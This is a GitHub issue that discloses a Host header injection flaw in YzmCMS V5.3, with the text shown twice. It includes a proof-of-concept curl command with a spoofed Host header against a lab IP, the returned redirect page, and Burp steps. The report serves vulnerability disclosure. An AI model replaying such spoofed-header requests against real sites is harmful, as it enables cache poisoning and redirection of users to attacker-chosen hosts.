Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Host header injection vulnerability found on YzmCMS V5.3, Using this attack, a malicious user can poison the web cache or arbitrary user re-direction.
PoC: Test Environment: Windows 7 SP1(64bit) XAMPP: 7.3.9 YzmCMS V5.3 Access Path: 192.168.30.169/yzmcms/
root@kali:~# curl http://192.168.30.169/yzmcms/member/ -H "Host: www.google.com"
本页面将在1秒后跳转...
Or if we capture this in burp:
GET /yzmcms/member/ HTTP/1.1 Host: 192.168.30.169
Next change the "Host" to www.google.com and "Go" for web request:
Then follow redirection
This will be re-directed to www.google.com with 404 responds. Capture the responds and open the browser will show following:
This is detected & email to you on 18-Sep-2019, but no responds. So provide information in here. Thank you.
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Host header injection vulnerability found on YzmCMS V5.3, Using this attack, a malicious user can poison the web cache or arbitrary user re-direction.
PoC:
Test Environment: Windows 7 SP1(64bit)
XAMPP: 7.3.9
YzmCMS V5.3 Access Path: 192.168.30.169/yzmcms/
root@kali:~# curl http://192.168.30.169/yzmcms/member/ -H "Host: www.google.com"
<title>YzmCMS提示信息</title> <style type="text/css"> *{padding:0;margin:0;} body{background:#fff;color:#000;font-family:"Microsoft Yahei","Hiragino Sans GB","Helvetica Neue",Helvetica,tahoma,arial,"WenQuanYi Micro Hei",Verdana,sans-serif;} #msg{border:1px solid #5eb95e;width:500px;position:absolute;top:44%;left:50%;margin:-87px 0 0 -250px;padding:1px;line-height:30px;text-align:center;font-size:16px;background:#fff;} #msgtit{height:35px;line-height:35px;color:#fff;background:#5eb95e;} #msgbody{margin:20px 0;text-align:center} #info{margin-bottom:10px;} #msgbody p{font-size:14px;} #msgbody p a{font-size:14px;color:#333;text-decoration:none;} #msgbody p a:hover{color:#5a98de;} </style>本页面将在1秒后跳转...
Or if we capture this in burp:
GET /yzmcms/member/ HTTP/1.1

Host: 192.168.30.169
Next change the "Host" to www.google.com and "Go" for web request:

Then follow redirection

This will be re-directed to www.google.com with 404 responds.

Capture the responds and open the browser will show following:
This is detected & email to you on 18-Sep-2019, but no responds. So provide information in here. Thank you.
The text was updated successfully, but these errors were encountered: